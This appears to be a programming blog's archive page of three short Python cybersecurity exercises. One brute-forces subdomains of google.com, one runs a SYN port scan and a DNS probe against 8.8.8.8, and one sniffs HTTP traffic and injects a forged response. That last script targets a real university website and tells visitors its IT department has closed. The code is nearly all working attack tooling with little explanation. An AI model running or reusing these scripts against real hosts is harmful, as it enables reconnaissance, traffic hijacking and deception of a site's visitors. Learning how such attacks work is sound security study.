Home » PROGRAMMING
Category Archives: PROGRAMMING
[Python] DNS Exploration
Source Code:
import dns
import dns.resolver
import socket
def ReverseDNS(ip):
try:
result=socket.gethostbyaddr(ip)
except:
return[]
return [result[0]]+result[1]
def DNSRequest(domain):
try:
result=dns.resolver.resolve(domain,’A’)
if result:
print(domain)
for answer in result:
print(answer)
print(“Domain Name: %s” % ReverseDNS(answer.to_text()))
except (dns.resolver.NXDOMAIN,dns.exception.Timeout):
return
def SubdomainSearch(domain,dictionary,nums):
for word in dictionary:
subdomain=word+”.”+domain
DNSRequest(subdomain)
if nums:
for i in range (0,10):
s=word+str(i)+”.”+domain
DNSRequest(s)
domain=”google.com”
d=”subdomains.txt”
dictionary=[]
with open(d,”r”) as f:
dictionary=f.read().splitlines()
SubdomainSearch(domain,dictionary,True)
Tham khảo: Introduction to Python for Cybersecurity, INFOSEC
[Python] Scanning Ports
Source Code:
from scapy.all import *
ports=[25,80,53,443,445,8080,8443]
def SynScan(host):
ans,unans=sr(IP(dst=host)/TCP(sport=5555,dport=ports,flags=”S”),timeout=2,verbose=0)
print(“Open ports at %s:” % host)
for (s,r,) in ans:
if s[TCP].dport==r[TCP].sport:
print(s[TCP].dport)
def DNSScan(host):
ans,unans=sr(IP(dst=host)/UDP(sport=5555,dport=53)/DNS(rd=1,qd=DNSQR(qname=”google.com”)),timeout=2,verbose=0)
if ans:
print(“DNS Server at %s” % host)
host=”8.8.8.8″
SynScan(host)
DNSScan(host)
Tham khảo: Introduction to Python for Cybersecurity, INFOSEC
[Python] Sniffing and Spoofing
Topology
Source Code:
from scapy.all import *
import scapy.all as S
from scapy.all import sniff
from scapy.layers import http
S.load_layer(“http”)
def sniff_spoof(packet):
if packet.haslayer(HTTPRequest) and packet[HTTPRequest].Host==b’fit.uet.vnu.edu.vn’:
http_layer=packet.getlayer(http.HTTPRequest)
ip_layer=packet.getlayer(IP)
print (“—————SNIFFING PACKETS—————“)
print (” Target: {0[dst]}\n Method: {1[Method]}\n URL: http://{1[Host]}”.format(ip_layer.fields, http_layer.fields))
print (“”)
print (“—————SPOOFING PACKETS—————“)
spoof_body=” SNIFFING and SPOOFING
THE IT DEPARTMENT of UET HAS JUST BEEN CLOSED !!!
“
spoof_packet=Ether(dst=packet[Ether].src,src=packet[Ether].dst)/IP(src=packet[IP].dst,dst=packet[IP].src,ttl=packet[IP].ttl)/TCP(sport=80,dport=packet[TCP].sport,seq=packet[TCP].ack,ack=packet[TCP].seq+len(packet[TCP].payload),flags=’FPA’)/HTTP()/HTTPResponse(Server=”Spoofed Server”)/spoof_body
sendp(spoof_packet)
interface=”eth0″
sniff(iface=interface, filter=’tcp and dst port 80′, prn=sniff_spoof)
Results